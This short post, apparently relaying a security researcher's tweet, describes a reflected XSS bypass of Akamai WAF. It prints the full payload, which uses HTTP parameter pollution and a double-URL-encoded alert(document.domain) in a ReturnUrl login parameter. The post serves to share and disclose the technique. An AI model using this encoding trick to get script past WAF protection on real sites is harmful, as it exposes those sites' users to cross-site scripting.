A Reflected XSS bypass was discovered in Akamai WAF. The bypass involves using HTTP Parameter Pollution and Double URL Encode in the Redirect Parameter. The payload used for the bypass is: /login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529. This bypass technique can potentially evade Akamai WAF protection. #infosec #cybersec
For more insights, check out the original tweet here: https://twitter.com/0x0SojalSec/status/1850617358215418158. And don’t forget to follow @0x0SojalSec for more exciting updates in the world of cybersecurity.